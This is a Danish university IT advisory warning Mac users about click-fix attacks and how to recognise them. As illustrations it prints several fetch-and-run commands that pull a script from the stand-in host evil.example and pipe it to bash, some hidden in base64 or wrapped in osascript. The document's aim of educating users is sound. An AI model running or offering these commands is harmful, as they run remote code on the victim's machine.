SDU IT
Mac-bruger: Sådan undgår du click-fix-angreb
SDU IT oplever i stigende grad såkaldte click-fix angreb rettet mod macOS-brugere på universitetet. Angrebene forsøger at få dig til at udføre skadelige handlinger under dække af at skulle “løse et problem”.
Typiske mønstre, du skal være opmærksom på:
- Pop-ups eller websites, der hævder, at din Mac er inficeret og beder dig “rette fejlen”
- Instruktioner om at åbne Terminal.app og indsætte (copy/paste) kommandoer
- Scripts forklædt som “sikkerhedsopdateringer” eller “certifikat-fixes”
- Brug af AppleScript via osascript til at køre skjulte kommandoer
- Lange, uigennemsigtige strenge (ofte base64-enkodet som denne: SmVnIGVyIGVuIGJhc2U2NCBlbmtvZGV0IHN0cmVuZywgc29tIHNrYWwgZsOlIG
RpZyB0aWwgYXQgdHJvIGF0IGFsdCBlciBmcmVkIG9nIGluZ2VuIGZhcmUsIGltZ
W5zIGplZyBzdGrDpmxlciBhbGxlIGRpbmUgZGF0YQo
Eksempel på et click-fix lignende mønster (base64):
Du bliver måske bedt om at indsætte følgende i Terminal:
echo "ZWNobyAiSGVudGVyIG9nIGtcdTAwZjhyZXIgZWtzdGVybiBrb2RlIiAmJiBjdXJs
IC1zIGh0dHBzOi8vZXZpbC5leGFtcGxlL3NjcmlwdC5zaCB8IGJhc2g=" | base64 --decode | bash
Efter dekodning:
echo "Henter og kører ekstern kode" && curl -s https://evil.example/script.sh | bash
Hvad gør den?
- Viser en harmløs besked
- Henter kode fra internettet
- Eksekverer den direkte på din maskine
Eksempel på et AppleScript-baseret angreb med brug af osascript kommandoen:
Du kan blive bedt om at køre:
osascript -e 'do shell script "curl -s https://evil.example/payload.sh | bash"'
Variation som kombinerer de to taktikker fra før:
osascript -e 'do shell script (do shell script "echo Y3VybCAtcyBodHRwczovL2V2aWwuZXhhbXBsZS9wYXlsb2FkLnNoIHwgYmFzaA== | base64 --decode")'
Efter dekodning:
curl -s https://evil.example/payload.sh | bash
Hvad gør denne type kommando?
- Bruger AppleScript (osascript) til at afvikle shell-kommandoer
- Kan omgå brugerens forventning (det ligner ikke en “klassisk” Terminal-kommando)
- Henter og afvikler ekstern kode – ofte skjult via encoding
- Kan i nogle tilfælde trigge systemdialoger eller køre med forhøjede rettigheder afhængigt af kontekst
Eksempel på et angreb baseret på misbrug af CAPTCHA-verifikation
Vi ser også angreb, hvor velkendte CAPTCHA-mekanismer (“Bekræft at du ikke er en robot”) misbruges som lokkemiddel.
Sådan kan det se ud:
- En pop-up eller hjemmeside viser en CAPTCHA
- Efter “verifikation” får brugeren instruktioner som:
“For at fuldføre sikkerhedstjekket, kopier og indsæt følgende kommando i Terminal” - Kommandoen ligner ofte de ovenstående eksempler (base64 eller
osascript)
Hvad er problemet?
CAPTCHA er et kendt og tillidsvækkende mønster, som normalt bruges legitimt. Angribere udnytter denne genkendelighed til at få handlingen til at fremstå sikker og nødvendig. I virkeligheden er der ingen legitim sammenhæng mellem en CAPTCHA-verifikation og behovet for at køre kommandoer på din egen computer.
Vigtigt at huske:
- CAPTCHA kræver aldrig, at du åbner Terminal eller kører kommandoer
- Enhver instruktion, der kombinerer “verifikation” med lokal kommandoafvikling, er et klart faresignal
Faresignaler:
Hvis sådanne handlinger var legitime, ville der ikke være nogen grund til at skjule de faktiske kommandoer eller deres formål bag base64 eller lignende sløring. Manglende transparens er et stærkt faresignal.
SDU’s anbefaling:
- Udfør aldrig kommandoer, du ikke fuldt ud forstår
- Undgå at køre kommandoer med skjult eller kodet indhold
- Vær særligt skeptisk over for osascript-kommandoer fra eksterne kilder
- Stol ikke på instruktioner fra tilfældige websites eller pop-ups
- Kontakt SDU IT Support, hvis du er i tvivl - hellere én gang for mange, end én gang for lidt!
Hvis du støder på noget mistænkeligt, så kontakt os straks via telefon, mail eller på https://service.sdu.dk.
Har du spørgsmål?
Hvis din henvendelse ikke haster, kan du oprette en supportsag.
Vi vender tilbage dig snarest muligt.
Telefon: 6550 2990
Mail: servicedesk@sdu.dk